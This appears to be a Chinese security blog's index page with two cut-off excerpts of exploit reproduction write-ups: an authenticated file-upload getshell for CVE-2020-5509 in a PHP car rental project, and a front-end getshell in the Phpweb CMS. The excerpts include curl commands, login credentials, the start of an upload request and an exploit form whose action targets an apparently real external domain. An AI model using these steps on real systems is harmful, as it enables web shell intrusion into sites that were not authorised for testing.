m4tirhacker@home:~$

  • CVE-2020-5509 Repetition

    零.前言: 下午在Github上逛,找代码学习,突然瞥到CVE-2020-5509,看到了外国友人写的POC 原址:https://github.com/FULLSHADE/CVE-2020-5509-POC 于是搭建了环境,进行复现! 一.环境搭建: 搭建环境: Windows server 2012 R2 阿帕奇 PHP7.5 官方源码:https://phpgurukul.com/car-rental-project-php-mysql-free-download/ 搭建时需要新建一个数据库,然后将官方给的.sql数据文件导入到那个库里! 之后配置config.php信息,(要配置两个,一个是\includes\config.php,一个是\admin\config.php) 搭建完成图: 之后就可以开始愉快地复现了! 二.复现过程: 我们先用国外人写的poc打一下靶场: python CVE-2020-5509.py 192.168.1.5(目标ip) [!] Failed to authenticate 难道失败了?我重新看了一遍国外人写的poc,原来有处坑! /carrentalproject/carrental/admin/changeimage1.php ##我们实际上是搭建在根目录的,不知道他这个/carrentalproject/carrental/目录是怎么来的,正是因为如此,才会获取不到tok值! 我们改一下poc! ba把路径中的/carrentalproject/carrental去掉,再试试! ok,成功了!(但是它的终端有点奇怪,不管他) 国外友人的工具我用的不适手,于是便打算自己写一个图形化的工具! 三.工具编写(.e): 话不多说,先构建界面,再导入一个精易模块: 然后双击”Getshell”按钮,进入代码界面! Getshell的第一步是要获取到Cookie,来进行鉴权文件上传! curl -H "http://website/admin/index.php/" -D "username=admin&password=Test@12345&login=" 然后就通过鉴权文件上传来进行getshell 上传包: --I am lonely Content-Disposition: form-data; name="img1";...

  • Phpweb Reception Getshell

    Phpweb 是一款企业cms,并不开源,但这并不妨碍Hacker们查找漏洞! 前言 这篇文章是复现Phpweb前台getshell漏洞,漏洞详细我不讲了,请自行到90SEC(forum.90sec.com)上查看! 本篇文章还会涉及工具的编写(Python)! 漏洞影响文件:/base/post.php /base/appfile.php /base/appplue.php /base/appborder.php 复现 1.首先要获取加密前的Md5值,用于文件较检,通过Post提交数据来获取! curl "http://website/base/post.php" -H "act=appcode" ac34c64cdb405eff881efc5476a64761 ##这个就是初始值 2.获取加密后得md5值 然后将初始值md5加密(ac34c64cdb405eff881efc5476a64761 + “a”) 得到加密后的MD5值! e10adc3949ba59abbe56e057f20f883e ##这个就是加密后的md5值(终值)! 3.Getsehll exp: <html> <body> <form action="http://wxzljz.com/base/appfile.php" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="file" id="file" /> <input type="text" name="t" value="a" /> <input type="text" name="m" value="25a824696cb75a44aabd05a08070789f" /> <input...